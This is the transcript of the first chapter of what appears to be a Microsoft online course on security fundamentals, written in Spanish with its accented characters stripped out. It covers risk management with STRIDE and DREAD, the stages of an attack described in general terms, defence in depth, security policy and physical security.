capitulo1
TRANSCRIPT
Fundamentos de seguridad
FUNDAMENTOS DE SEGURIDAD1. Requisitos previos para el curso on-line
Experiencia prctica en la instalacin, configuracin, administracin y planeamiento de la implementacin de Windows 2000 o Windows Server 2003 Experiencia con Active Directory2. Panorama actual
2.1. El delito informtico est aumentando de frecuencia y de severidad:
Los meses recientes han considerado un claro aumento en ataques criminales contra los sistemas informticos del mundo. La naturaleza del riesgo est cambiando rpidamente y est llegando a ser ms y ms seria. Los hackers criminales se estn sofisticando y la proliferacin de conexiones de banda ancha de alta velocidad una cosa muy positiva en todos aspectos crea un ambiente en el cual un virus o un gusano puede esparcirse increblemente rpido y afectar a negocios y a consumidores ms rpidamente y perceptiblemente que antes.
2.2. La tecnologa existe para los sistemas de proteccin pero la clave est en la puesta en prctica:
Mientras que no hay software inmune a estos ataques criminales, las computadoras se pueden instalar y mantener de manera de reducir al mnimo el riesgo. Pero hasta la fecha ha sido demasiado difcil, complicado y desafiante administrar las herramientas existentes de seguridad, muchas de las cuales, cuando se implementan apropiadamente, son altamente eficaces en la prevencin o la atenuacin del impacto en la computadora atacada.
2.3. Microsoft est tratando el problema de complejidad hoy y en el futuro:
Reconocemos que Microsoft puede desempear un papel dominante en mejorar la seguridad de la computadora: necesitamos continuar invirtiendo y entregando un nivel ms alto de seguridad, necesitamos simplificar la seguridad y conducir la inteligencia de las protecciones de seguridad ms profundas en nuestro software para reducir las demandas en los usuarios y los administradores. Los clientes nos dicen que esperan que nosotros hagamos ms y nosotros estamos escuchando y trabajando de maneras mltiples para innovar y tratar el problema.
Los clientes nos han dicho que quieren que las herramientas, las caractersticas y las configuraciones de seguridad sean ms fciles de poner en prctica y ms simples de utilizar, y que las protecciones de seguridad sean intrnsecas al software.
Durante este curso, hablaremos de cmo Microsoft est respondiendo a estas demandas y al contorno de acciones que estamos llevando a cabo, integrando tecnologas de seguridad.
Las acciones especficas incluirn: Los procesos, las polticas y las tecnologas mejoradas de la administracin de parches para ayudar a clientes a permanecer actualizados y seguros.
El otorgamiento de una direccin mejor y las herramientas para asegurar sistemas.
Actualizaciones a Microsoft Windows XP y Windows Server 2003 con las nuevas tecnologas de seguridad ,que harn a Windows ms resistente a los ataques, incluso si los parches todava no existen ni se han instalado.3. Definir Seguridad de Plataforma
Hay varias pautas, estndares y recomendaciones disponibles que pueden ayudar a simplificar la tarea de asegurar su empresa. Miremos algunos de stos detalladamente.IT Infrastructure Library (ITIL) DefinitionEl gerenciamiento de la seguridad es responsable de la confidencialidad, la integridad y la disponibilidad de datos asociados a un servicio. Un nmero de security issues tienen que ser cubiertos por la administracin de disponibilidad:
Los servicios deben estar disponibles slo para el personal autorizado
Los datos deben estar disponibles solamente para el personal autorizado y solamente en las horas convenidas
Los servicios deben ser recuperables dentro de los parmetros convenidos de confidencialidad e integridad
Los servicios se deben disear y funcionar dentro de las polticas de seguridad
Los contratistas deben tener acceso al hardware o al software
Nota: Para ms informacin, ir a http://www.itil.org/itil_e/itil_e_080.html
ISO 17799 (British Standard 7799)De http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter
La informacin es la sangre de todas las organizaciones y puede existir en muchas formas. Puede ser impresa o escrita en papel, almacenada electrnicamente, transmitida por correo electrnico, mostrada en pelculas o hablada en una conversacin. En el ambiente de negocio competitivo de hoy, tal informacin est constantemente bajo amenaza de muchas fuentes. stas pueden ser internas, externas, accidentales o maliciosas. Con el uso creciente de la nueva tecnologa, al almacenar, transmitir y recuperar la informacin, hemos abierto un gran nmero y tipo creciente de amenazas.
Hay una necesidad de establecer una poltica comprensiva de seguridad de la informacin dentro de todas las organizaciones. Usted necesita asegurar la confidencialidad, integridad y disponibilidad de la informacin corporativa vital y de la informacin del cliente. El estndar para Information Security Management System (ISMS) BS 7799, ya ha sido rpidamente establecido por los vendedores de software ms grandes del mundo.
ISO 17799 (British Standard 7799) proporciona un acercamiento sistemtico para administrar la informacin corporativa sensible. Proporciona los requisitos para Information Security Management System. Security Management System es un cdigo de prctica que incluye gente, procesos, y sistemas. ISO 17799 abarca de las diez secciones. Como ISO 17799 es un estndar, se recomienda que ste sea repasado para el detalle en cada una de las 10 clasificaciones de seguridad.Nota: Para ms informacin, ir a:
http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf
http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf
http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter
Microsoft Operations Framework
Cap1-34.jpg
Microsoft Operations Framework (MOF) proporciona la direccin tcnica y la ayuda de consulta que permite a organizaciones alcanzar confiabilidad, disponibilidad, soportabilidad y flexibilidad en sistemas de misin critica de los productos y tecnologas Microsoft.
MOF proporciona la direccin operacional en forma de white papers, guas de operaciones, herramientas, las mejores prcticas, casos de estudio, plantillas, herramientas de soporte y servicios. Estas guas estn dirigidas a gente, procesos, tecnologa y administracin de issues complejos, ambientes IT heterogneos y distribuidos.
4. Indice del presente captulo Caso prctico
Disciplina de administracin de riesgos de seguridad
Defensa en profundidad
Respuesta a incidentes de seguridad
Ejemplos de ataques
Recomendaciones
Diez normas de seguridad inmutables5. Caso prcticoAqu se establecer el fundamento empresarial de la seguridad. Especficamente, se tratar: Las consecuencias de las infracciones de seguridad.
La encuesta de CSI/FBI de 2003.
5.1. Repercusin de las infracciones de seguridad
Cap1-01.jpg
Las infracciones de seguridad afectan a las organizaciones de diversas formas. Con frecuencia, tienen los resultados siguientes: Prdida de beneficios
Perjuicio de la reputacin de la organizacin
Prdida o compromiso de la seguridad de los datos
Interrupcin de los procesos empresariales
Deterioro de la confianza del cliente
Deterioro de la confianza del inversor
Consecuencias legales: en muchos estados o pases, la incapacidad de proteger un sistema tiene consecuencias legales; un ejemplo es Sarbanes Oxley, HIPAA, GLBA, California SB 1386.
Las infracciones de seguridad tienen efectos de gran repercusin. Cuando existe una debilidad en la seguridad, ya sea real o slo una percepcin, la organizacin debe emprender acciones inmediatas para garantizar su eliminacin y que los daos queden restringidos.
Muchas organizaciones tienen ahora servicios expuestos a los clientes, como los sitios Web. Los clientes pueden ser los primeros en observar el resultado de un ataque. Por lo tanto, es esencial que la parte de una compaa que se expone al cliente sea lo ms segura posible.5.2. Encuesta de CSI/FBI de 2003
Cap1-02.jpg
El costo de la implementacin de medidas de seguridad no es trivial; sin embargo, slo es una fraccin del costo que supone mitigar un incidente de seguridad. La encuesta ms reciente sobre seguridad y delitos informticos del Instituto de seguridad de equipos y de la Oficina Federal de Investigacin (CSI/FBI, Computer Security Institute/Federal Bureau of Investigation) de Estados Unidos, incluye cifras interesantes relativas a las prdidas financieras que suponen los ataques a equipos para las organizaciones que los sufren.
La encuesta demuestra que los ataques de denegacin de servicio (DoS, Denial Of Service) y de robo de informacin son los responsables de las mayores prdidas.
En consecuencia, es importante saber que aunque el costo de la implementacin de sistemas de proteccin de la seguridad no es trivial, supone una fraccin del costo que conlleva mitigar los compromisos de la seguridad.
La solucin de seguridad ms efectiva es la creacin de un entorno en niveles de modo que se pueda aislar un posible ataque llevado a cabo en uno de ellos. Un ataque tendra que poner en peligro varios niveles para lograr su propsito. Esto se conoce como defensa en profundidad. Esta estructura de seguridad se explicar detalladamente ms adelante en esta presentacin.6. Disciplina de administracin de riesgos de seguridad
En este captulo, se explicar la disciplina de administracin de riesgos de seguridad (SRMD). Especficamente, se tratar:
Los tres procesos de SRMD son: Evaluacin.
Desarrollo e implementacin.
Funcionamiento.La evaluacin implica:
Evaluacin y valoracin de activos.
Identificacin de riesgos de seguridad con STRIDE.
Anlisis y asignacin de prioridad a los riesgos de seguridad con DREAD.
Seguimiento, planeamiento y programacin de actividades relacionadas con los riesgos de seguridad.
El desarrollo e implementacin incluyen:
Desarrollo de mtodos correctivos de seguridad.
Prueba de los mtodos correctivos de seguridad.
Obtencin de informacin de seguridad.El funcionamiento incluye
Volver a valorar los activos nuevos y los que han sufrido cambios, as como los riesgos de seguridad.
Estabilizar e implementar medidas preventivas nuevas o que han cambiado.
6.1. Procesos
Cap1-03.jpg
La disciplina de administracin de riesgos de seguridad (SRMD, Security Risk Management Discipline) define los tres procesos principales que una organizacin debe implementar para llegar a ser segura y continuar sindolo. Los tres procesos son:
Evaluacin: esta fase implica la recopilacin de la informacin relevante del entorno de la organizacin con el fin de realizar una estimacin de la seguridad. Debe recopilar datos suficientes para analizar de forma efectiva el estado actual del entorno. A continuacin, se debe determinar si los activos de informacin de la organizacin estn bien protegidos de posibles amenazas, y se debe crear un plan de accin de seguridad, que se pone en prctica durante el proceso de implementacin. Desarrollo e implementacin: esta fase se centra en la puesta en marcha de un plan de accin de seguridad destinado a implementar los cambios recomendados definidos en la fase de evaluacin. Adems, se desarrolla un plan de contingencia de riesgos de seguridad. Funcionamiento: durante esta fase, se debe modificar y realizar actualizaciones en el entorno a medida que se necesiten para mantener su seguridad. Durante los procesos operativos, se llevan a cabo estrategias de pruebas de la penetracin y de respuesta a incidentes, que ayudan a solidificar los objetivos de la implementacin de un proyecto de seguridad en la organizacin. Asimismo, tambin se realizan actividades de auditora y supervisin para mantener la infraestructura intacta y segura.
En la gua de Microsoft Solutions para la proteccin de Windows 2000 Server (Microsoft Solutions Guide for Securing Windows 2000 Server) en www.microsoft.com, se encuentran detalles adicionales de SRMD.
7. Evaluacin: evaluar y valorar
Cap1-04.jpg
La evaluacin de activos determina el valor reconocido de la informacin desde el punto de vista de quienes la utilizan y el trabajo que conlleva su desarrollo. La evaluacin de activos tambin implica determinar el valor de un servicio de red, por ejemplo, el de un servicio que proporciona a los usuarios de la red acceso saliente a Internet, desde el punto de vista de quienes utilizan dicho servicio y lo que costara volver a crearlo. La valoracin determina cunto cuesta mantener un activo, lo que costara si se perdiera o destruyera y qu beneficio lograran terceros si obtuvieran esta informacin. El valor de un activo debe reflejar todos los costos identificables que surgiran si el activo se viera perjudicado.
Al determinar las prioridades en relacin a los activos, se pueden emplear valores arbitrarios, como los mostrados en la diapositiva, o valores especficos, como el costo monetario real. Las organizaciones deben utilizar la escala ms apropiada para resaltar el valor relativo de sus activos.
Cap1-05.jpg
La identificacin de los riesgos de seguridad permite a los miembros de los grupos de trabajo del proyecto aclarar las ideas e identificar posibles riesgos para la seguridad. La informacin se recopila en forma de amenazas, vulnerabilidades, puntos dbiles y medidas preventivas. El modelo STRIDE proporciona una estructura valiosa y fcil de recordar para identificar las amenazas y los posibles puntos dbiles.
La suplantacin de identidades es la capacidad de obtener y usar la informacin de autenticacin de otro usuario. Un ejemplo de suplantacin de identidad es la utilizacin del nombre y la contrasea de otro usuario.
La alteracin de datos implica su modificacin. Un ejemplo sera alterar el contenido del cookie de un cliente.
El repudio es la capacidad de negar que algo ha ocurrido. Un ejemplo de repudio sera que un usuario cargue datos dainos en el sistema cuando en ste no se puede realizar un seguimiento de la operacin.
La divulgacin de informacin implica la exposicin de informacin ante usuarios que se supone que no deben disponer de ella. Un ejemplo de divulgacin de informacin es la capacidad de un intruso para leer archivos mdicos confidenciales a los que no se le ha otorgado acceso.
Los ataques de denegacin de servicio privan a los usuarios del servicio normal. Un ejemplo de denegacin de servicio consistira en dejar un sitio Web inaccesible al inundarlo con una cantidad masiva de solicitudes HTTP.
La elevacin de privilegios es el proceso que siguen los intrusos para realizar una funcin que no tienen derecho a efectuar. Para ello, puede explotarse una debilidad del software o usar las credenciales de forma ilegtima.
Otros ataques podran ser llevados a cabo nicamente con el propsito de que el sistema de destino incurra en gastos. Por ejemplo, se podra montar un ataque contra un servicio de fax o un telfono celular para hacer un gran nmero de llamadas internacionales que supongan un gran costo.
7.1. Amenazas comunes7.1.1. Quin puede atacar?
Cap1-28.jpg
Los atacantes de todas las capacidades y motivaciones son peligrosos a la seguridad de la red interna, de diversas maneras:
Principiante. La mayora de los atacantes tienen solamente conocimiento bsico de sistemas pero son inmviles y peligrosos porque no entienden a menudo completamente las consecuencias de sus acciones.
Intermedio. Los atacantes con habilidades intermedias generalmente estn intentando ganar respeto en comunidades de atacantes. Tpicamente, atacan blancos prominentes y crean herramientas automatizadas para atacar otras redes.
Avanzado. Los atacantes altamente expertos presentan un desafo serio a la seguridad porque sus mtodos de ataque se pueden extender ms all de la tecnologa en intrusin fsica e ingeniera social, o engao de un usuario o administrador para ganar la informacin. Aunque hay relativamente pocos atacantes avanzados, sus habilidades y la experiencia los hacen los atacantes ms peligrosos a una red.
7.1.2. Vulnerabilidades
Cap1-29.jpg
Los ataques ms acertados contra redes tienen xito explotando el campo comn y las vulnerabilidades o debilidades sabidas. Asegrese de entrenar a administradores y reconocer estas vulnerabilidades para que lleguen a ser familiares con nuevas vulnerabilidades cuando ellas se descubran.
7.1.3. Cmo ocurren los ataques?
Cap1-30.jpg
Los ataques contra redes siguen a menudo el mismo patrn. Mtodos de diseo para detectar, responder o prevenir ataques durante cada una de las siguientes etapas:
1. Ingreso. En esta etapa, el atacante investiga a la organizacin blanco. l puede obtener toda la informacin pblica sobre una organizacin y sus empleados y realizar exploraciones completas en todas las computadoras y dispositivos que son accesibles desde Internet.
2. Penetracin. Despus de que el atacante haya localizado vulnerabilidades potenciales, intenta aprovecharse de una de ellas. Por ejemplo, el atacante explota un Servidor Web que carece de la actualizacin ltima de seguridad.
3. Elevacin del privilegio. Luego que el atacante ha penetrado con xito la red, procura obtener los derechos a nivel sistema de Administrador. Por ejemplo, mientras que explota el servidor Web, gana control de un proceso funcionando bajo el contexto LocalSystem. Este proceso ser utilizado para crear una cuenta administrador. En general, seguridad pobre como resultado de usar las configuraciones por defecto, permite que un atacante obtenga el acceso de red sin mucho esfuerzo.
4. Explotar. Despus de que el atacante haya obtenido las derechas necesarias, l realiza la hazaa o mtodo de romper la red. Por ejemplo, el atacante elige desfigurar el sitio pblico Web de la organizacin.
5. Cover-up. La etapa final de un ataque es donde un atacante procura ocultar sus acciones para escapar a la deteccin o el procesamiento. Por ejemplo, un atacante borra entradas relevantes en archivos log de la intervencin.7.2. Evaluacin: anlisis y establecimiento de prioridades de los riesgos de seguridad: DREAD DREAD
Dao
Capacidad de reproduccin
Capacidad de explotacin
Usuarios afectados
Capacidad de descubrimiento Exposicin al riesgo = Prioridad del activo x Categora de la amenaza
El anlisis de riesgos de seguridad se utiliza para analizar los ataques, herramientas, mtodos y tcnicas que podran usarse para explotar una posible vulnerabilidad. El anlisis de riesgos de seguridad es un mtodo para la identificacin de riesgos y la evaluacin del posible dao que podra ocasionarse. El resultado de la evaluacin puede usarse para justificar medidas de proteccin de la seguridad.
Un anlisis de riesgos de seguridad tiene tres objetivos principales: identificar riesgos, cuantificar los efectos de las posibles amenazas y proporcionar un equilibrio econmico entre la repercusin del riesgo y el costo de la medida preventiva. La informacin se recopila para estimar el grado de riesgo de modo que el grupo de trabajo pueda tomar decisiones fundadas en relacin a qu riesgos de seguridad deben constituir el objeto principal de las estrategias correctivas.
Este anlisis se usa entonces para asignar prioridad a los riesgos de seguridad y permitir a la organizacin destinar los recursos para tratar los problemas de seguridad ms importantes.
Una vez identificada una amenaza, debe clasificarse. Una solucin para ello es usar DREAD. La clasificacin de 1 a 10 se asigna en cinco reas: daos, capacidad de reproduccin, capacidad de explotacin, usuarios afectados y capacidad de descubrimiento.
La clasificacin se realiza como promedio, con lo que ofrece una categora global de amenazas. Cuanto mayor es la categora, ms grave es la amenaza. Esta clasificacin proporciona una perspectiva de la prioridad relativa de cada riesgo en vez de una cuantificacin real del mismo. Para ello se pede tomar esta categora y multiplicarla por el grado de imprescindibilidad de un sistema para conocer el riesgo que supone para ste.
7.3. Elementos a proteger
Cap1-31.jpg
Adems de la proteccin fsica enumerada en la tabla, gran parte del papel de la seguridad es proteger la confianza pblica y la confianza en socios de negocio. En las prcticas generalmente aceptadas de la contabilidad (GAAP), este tipo de activo se conoce como voluntad, que se puede poner en estados financieros cuando venden a una compaa.
Considerar, por ejemplo, que un atacante atac el sitio Web de su organizacin.
Usted notifica a sus clientes que el atacante ha robado la informacin privada de
Usuarios del sitio Web, incluyendo sus direcciones y nmeros de tarjeta de crdito. Adems de incurrir en prdidas financieras directas del negocio, su organizacin tambin sufre una prdida de confianza porque se desdibuja la imagen de la compaa.
Cap1-06.jpg
Las tareas de seguimiento, planeamiento y programacin de riesgos de seguridad toman la informacin obtenida en el anlisis de riesgos de seguridad y se utilizan para formular estrategias correctivas y de contingencia, adems de los planes para abarcarlas.
La programacin de riesgos de seguridad intenta definir un programa para las diversas estrategias correctivas, creadas durante la fase de generacin de un proyecto de seguridad. Esta programacin tiene en consideracin la forma en que los planes de seguridad se aprueban e incorporan a la arquitectura de informacin, adems de los procedimientos de operaciones diarias estndares que deben implementarse.
Cap1-07.jpg
El desarrollo de mtodos correctivos para los riesgos de seguridad es un proceso en el que se toman los planes creados durante la fase de evaluacin y se usan para elaborar una nueva estrategia de seguridad que implique la administracin de la configuracin y las revisiones, la supervisin y auditora de los sistemas, y la creacin de directivas y procedimientos operativos.
A medida que se desarrollan las diversas medidas preventivas, es importante garantizar que se realice un seguimiento e informe minuciosos del progreso.
La prueba de las estrategias correctivas de los riesgos de seguridad tienen lugar despus de su desarrollo, una vez realizados los cambios de administracin del sistema asociados y escrito las directivas y procedimientos para determinar su efectividad.
El proceso de prueba permite al grupo de trabajo considerar cmo se pueden implementar dichos cambios en un entorno de produccin. Durante el proceso de prueba, las medidas preventivas se evalan teniendo en cuenta la efectividad con respecto a cmo se consigue controlar el riesgo de seguridad y a los efectos indeseables que se observan en otras aplicaciones.
7.4. Obtencin
Cap1-08.jpg
El conocimiento de los riesgos de seguridad permite formalizar el proceso para recopilar la informacin sobre cmo el grupo de trabajo protegi los activos y documenta las vulnerabilidades y puntos dbiles que se descubrieron. Cuando el departamento de tecnologa de la informacin (IT, Information Technology) rene nueva informacin relativa a la seguridad, dicha informacin se debe capturar y volver a implementar para garantizar la mxima eficacia, continuada de las medidas preventivas de seguridad que protegen los activos de la organizacin. Adems, se debe implantar un programa de aprendizaje destinado a los grupos empresariales. Este programa de aprendizaje puede tomar la forma de cursos instructivos o de boletines diseados para adquirir conciencia de la seguridad.
Una organizacin debe definir un proceso formal de administracin de riesgos que determinar cmo se inician y evalan las medidas preventivas, y en qu circunstancias se debe avanzar de un paso a otro en cada riesgo de seguridad o conjunto de riesgos.
7.5. Funcionamiento: reevaluacin de los activos y los riesgos
Cap1-09.jpg
Las organizaciones son dinmicas y su plan de seguridad tambin debe serlo. Se debe actualizar la evaluacin de riesgos peridicamente. Asimismo, valorar el plan de evaluacin de riesgos cada vez que se realice un cambio importante en el funcionamiento o en la estructura. Es decir, si se efecta una reorganizacin o se traslada a un edificio nuevo o se cambia de proveedores o se activa un nuevo sitio Web o se realizan otros cambios importantes, se deben volver a evaluar los riegos y las posibles prdidas mediante los pasos descritos anteriormente en la fase de evaluacin.
Es importante evaluar los riesgos de forma continuada. Esto significa que nunca se debe dejar de buscar nuevos riesgos ni de reevaluar peridicamente los riesgos existentes. Si no se realiza alguna de estas acciones, la administracin de riesgos no beneficiar a la organizacin. La frecuencia con que se debe revisar el plan de administracin de riesgos y sus activadores debe definirse en la directiva de seguridad de la organizacin.
La reevaluacin de activos y riesgos es esencialmente un proceso de administracin de cambios, pero tambin se utiliza para realizar la administracin de la configuracin de seguridad. Esto permite reducir el trabajo administrativo cuando se han completado las medidas preventivas y las directivas de seguridad.
7.6. Funcionamiento: estabilizacin y desarrollo de medidas preventivas
Cap1-10.jpg
En general, la Disciplina de Administracin de Riesgos de Seguridad se basa en los siguientes componentes de la gua de ciclo de vida de tecnologa de la informacin de Microsoft:
Disciplina de administracin de riesgos de Microsoft Solutions Framework (MSF) http://www.microsoft.com/technet/itsolutions/techguide/msf/msrmd11.mspx (este sitio est en ingls)
Modelo de riesgo para operaciones de Microsoft Operations Framework (MOF) http://www.microsoft.com/technet/itsolutions/techguide/mof/mofrisk.mspx (este sitio est en ingls)
La diapositiva muestra el modelo de riesgo para operaciones de MOF, que describe los pasos del proceso de administracin de riesgos: identificar, analizar, planear, rastrear y controlar. Se trata de un proceso continuado que implica la evaluacin y el anlisis continuados de los riesgos de seguridad. En consecuencia, ser necesario implementar continuamente nuevas medidas preventivas o realizar cambios en las existentes, basndose en esta nueva evaluacin.
Despus de la implementacin de las medidas preventivas nuevas o que han cambiado, es importante mantener el proceso de las operaciones. Las tareas que los administradores de seguridad o los administradores de redes tienen que realizar pueden incluir:
Administracin del sistema
Mantenimiento de cuentas
Supervisin de servicios
Programacin de trabajos
Procedimientos de copia de seguridad
Estos procesos de implementacin de la estabilizacin y las medidas preventivas corresponden a las fases de estabilizacin y desarrollo del modelo de proceso MSF, que pueden encontrarse enhttp://www.microsoft.com/technet/itsolutions/techguide/msf/msfpm31.mspx(este sitio est en ingls).
8. Defensa en profundidadEn este tema, se expondr la defensa en profundidad. Especficamente, se tratar:
Organizacin de una estructura para la seguridad: defensa en profundidad.
Cmo se puede ver comprometida la seguridad de cada nivel del modelo de defensa en profundidad.
Cmo proporcionar proteccin para cada nivel del modelo de defensa en profundidad.
Para reducir riesgo en un ambiente, se debe utilizar una estrategia de la defensa-en-profundidad para proteger recursos contra amenazas externas e internas. Defensa en profundidad (llamado a veces seguridad en profundidad o seguridad de varias capas) se toma de un trmino militar usado para describir las contramedidas de la seguridad para formar un ambiente cohesivo de seguridad sin un solo punto de falla. Las capas de la seguridad que forman la estrategia de defensa-en-profundidad deben incluir medidas protectoras que implementen desde sus routers externos completamente a la localizacin de los recursos y a todos los puntos entre ellos.
Por capas mltiples se implementa seguridad, y se debe ayudar a asegurar una capa si se compromete la misma, Las otras capas proporcionarn la seguridad necesaria para proteger los recursos. Por ejemplo, el compromiso del firewall de una organizacin no debe proporcionar acceso del atacante a los datos ms sensibles de la organizacin. Cada capa debe proporcionar idealmente diversas formas de contramedidas para evitar que el mismo mtodo de ataque sea utilizado en las diferentes capas.
Se debe invertir en una proteccin multi-vendor contra virus si es posible. Tambin es necesario asegurarse de que la proteccin de virus est configurada en diversos puntos como gateway, server, clientes etctera.8.1. Estructura de organizacin de la seguridad
Cap1-11.jpg
Para reducir al mnimo la posibilidad de que un ataque contra una organizacin tenga xito, se debe utilizar el mayor nmero posible de niveles de defensa.
Defender una organizacin en profundidad implica el uso de varios niveles de defensa. Si un nivel se ve comprometido, ello no conlleva necesariamente que tambin lo est toda la organizacin. Como directriz general, se debe disear y crear cada nivel de la seguridad bajo el supuesto de que se ha conseguido infringir la seguridad. Realizar los pasos necesarios para proteger el nivel en el que se est trabajando.
Adems, hay muchas formas de proteger cada nivel individual mediante herramientas, tecnologas, directivas y la aplicacin de las recomendaciones. Por ejemplo: Nivel de directivas, procedimientos y concienciacin: programas educativos de seguridad para los usuarios Nivel de seguridad fsica: guardias de seguridad, bloqueos y dispositivos de seguimiento Nivel perimetral: servidores de seguridad de hardware, software o ambos, y creacin de redes privadas virtuales con procedimientos de cuarentena Nivel de red de Internet: segmentacin de red, Seguridad IP (IPSec) y sistemas de deteccin de intrusos de red Nivel de host: prcticas destinadas a reforzar los servidores y clientes, herramientas de administracin de revisiones, mtodos seguros de autenticacin y sistemas de deteccin de intrusos basados en hosts. Nivel de aplicacin: prcticas destinadas a reforzar las aplicaciones y el software antivirus
Nivel de datos: listas de control de acceso (ACL) y cifrado
8.2. Descripcin de las directivas, los procedimientos y el nivel de concienciacin
Cap1-12.jpg
Generalmente, los usuarios no tienen en cuenta la seguridad cuando realizan sus tareas diarias.
Una directiva de seguridad para una organizacin debe definir:
El uso aceptable.
El acceso remoto.
La proteccin de la informacin.
La copia de seguridad de los datos.
La seguridad del permetro.
La seguridad de los dispositivos y hosts bsicos.
Una directiva debe comunicar consenso y proporcionar el fundamento para que el departamento de Recursos Humanos acte en el caso de que se infrinja la seguridad. Tambin puede ayudar a demandar a quienes logren infringir la seguridad.
Una directiva de seguridad debe proporcionar a la organizacin un procedimiento de tratamiento de incidentes apropiado. Debe definir:
Las reas de responsabilidad.
El tipo de informacin que debe registrarse.
El destino de esa informacin.
Qu acciones emprender tras un incidente.
Una directiva de seguridad adecuada suele ser el fundamento del resto de prcticas de seguridad. Cada directiva debe ser lo suficientemente general para poder aplicarse en distintas tecnologas y plataformas. Al mismo tiempo, debe ser lo suficientemente especfica para proporcionar a los profesionales de IT orientacin sobre cmo implementar la directiva.
El mbito de la directiva de seguridad de una organizacin depende del tamao y complejidad de sta. En muchas organizaciones hay consejos disponibles sobre cmo crear directivas de seguridad, por ejemplo, en http://www.sans.org/ y http://www.iss.net/ (estos sitios estn en ingls).
8.3. Directivas, procedimientos y compromiso del nivel de concienciacinLos intrusos pueden usar estratagemas sociales para aprovecharse de los usuarios que no son conscientes de los problemas de seguridad que pueden surgir en su lugar de trabajo o que los desconocen. Para los usuarios, muchas medidas de seguridad parecen innecesarias y, por lo tanto, no las siguen.
Muchos ataques implican el uso de estratagemas sociales. Ciertos artificios sociales se aprovechan de la despreocupacin por la seguridad con que la mayor parte de los usuarios actan en su vida diaria. Un intruso puede emplear su tiempo de ocio o de trabajo en intentar conocer a los usuarios y ganarse su confianza. Aunque un intruso formule preguntas aparentemente inofensivas, la informacin que obtiene en conjunto le proporciona los medios para llevar a cabo o iniciar un ataque.
8.4. Directivas, procedimientos y proteccin del nivel de concienciacin Para contrarrestar estas amenazas de estratagemas sociales, las organizaciones deben implementar procedimientos claros y precisos, y procesos que deban cumplir todos los empleados, adems de entrenarlos en el uso de estas directivas. Cada funcin que se desempee debe tener instrucciones claras y documentadas.
Siempre se requieren programas de aprendizaje sobre seguridad para detallar estos procesos y procedimientos. Las instrucciones deben formar una imagen completa de la seguridad de modo que los usuarios entiendan la necesidad de disponer de seguridad en todos los niveles y en todas las ocasiones.
Una directiva de seguridad combina las necesidades de seguridad y la cultura de una organizacin. Se ve afectada por el tamao de la organizacin y sus objetivos. Algunas directivas pueden ser aplicables a todos los sitios pero otras son especficas de ciertos entornos. Una directiva de seguridad debe equilibrar la posibilidad de control con la necesidad de productividad. Si las directivas son demasiado restrictivas, los usuarios siempre encontrarn formas de omitir los controles. Una organizacin debe demostrar un compromiso en la administracin con respecto al grado de control definido en una directiva; de lo contrario, no se implementar correctamente.
8.5. Descripcin del nivel de seguridad fsica
Cap1-13.jpg
Un intruso con acceso a los componentes fsicos puede omitir fcilmente muchos procedimientos de seguridad.
Un intruso puede utilizar el telfono de una compaa o un dispositivo de mano. Acciones como ver las listas de contactos o nmeros de telfono, enviar un mensaje de correo electrnico o responder al telfono identificndose como su propietario, pueden facilitar al intruso la consecucin de su objetivo.
Los equipos porttiles de una compaa pueden contener abundante informacin muy til para un intruso. Es por ello que siempre deben almacenarse de un modo seguro cuando no se estn usando.
8.6. Compromiso del nivel de seguridad fsica
Cap1-14.jpg
Si los intrusos obtienen acceso fsico a los sistemas, pasan a convertirse en efecto en sus propietarios.
En algunos casos, un ataque slo es un acto vandlico. Deshabilitar un sistema puede constituir un problema importante, pero no es menos serio que el hecho de que un intruso pueda ver, cambiar o eliminar datos que se piensa que son seguros.
El acceso fsico a un sistema tambin permite a un intruso instalar software. El software puede pasar desapercibido y ejecutarse en un sistema durante un perodo considerable, durante el que consigue recopilar datos esenciales de la compaa. Esto puede resultar desastroso.
8.7. Proteccin en el nivel de seguridad fsica Se puede utilizar una amplia variedad de tcnicas para proteger una instalacin. El grado de seguridad fsica disponible depende del presupuesto. Es fcil mantener estndares elevados cuando se trabaja con un modelo hipottico. Sin embargo, en el mundo real, las soluciones deben idearse en funcin del sitio, los edificios y las medidas de seguridad empleadas. La lista de la diapositiva presenta algunas de las maneras en que puede proteger una instalacin.
La defensa en profundidad comienza por aplicar una seguridad fsica a todos los componentes de la infraestructura. Si algn individuo no autorizado tiene acceso fsico al entorno, ste no se puede considerar seguro. Por ejemplo, un tcnico de mantenimiento podra cambiar un disco con errores en una matriz RAID1 que contenga datos de clientes. Es posible que el disco se pueda reparar. Los datos estn ahora en manos de un tercero.
El primer paso es separar los servidores de los operadores humanos y los usuarios. Todas las salas de servidores deben estar cerradas con llave. El acceso a las salas de servidores debe estar controlado y registrado estrictamente. Algunos de los mecanismos de control de acceso que pueden aplicarse incluyen el uso de placas de identificacin y sistemas biomtricos. Un empleado de confianza debe organizar de antemano el acceso y autorizarlo. Si no existen salas especiales para los servidores, stos se deben proteger en cabinas o, al menos, cerrarse bajo llave en los armarios. La mayor parte de los armarios de servidores se puede abrir con una llave estndar de modo que no debe confiar nicamente en las cerraduras que vengan de fbrica.
Todas las salas de servidores deben disponer de algn tipo de mecanismo contra incendios: los incendios provocados constituyen una amenaza que requiere una medida preventiva.
El acceso debe ser supervisado por guardias de seguridad o mediante un circuito cerrado de televisin (CCTV). Las grabaciones de vdeo de CCTV se pueden usar con fines de auditora y la presencia de cmaras puede servir para prevenir accesos oportunistas. Tenga en cuenta que en la mayor parte de las ocasiones, quienes consiguen infringir la seguridad son individuos que curiosean sin malas intenciones, no piratas informticos especializados que persiguen un fin daino.
El acceso fsico se extiende a las consolas de administracin remotas, adems de a los servidores. No tiene sentido proteger directamente el acceso a los monitores y los teclados si los servicios de terminal pueden tener acceso a los servidores desde cualquier lugar de la red interna. Esta directriz se aplica a las soluciones de monitor de vdeo de teclado (KVM, Keyboard Video Monitor) IP y tambin al hardware de administracin remota.
Igualmente, es importante limitar las oportunidades que puedan facilitar que los usuarios, con buenas intenciones o no, infecten o pongan en peligro un sistema. Quitar los dispositivos de entrada de datos como las unidades de disquete y de CD-ROM de los sistemas que no los requieran.
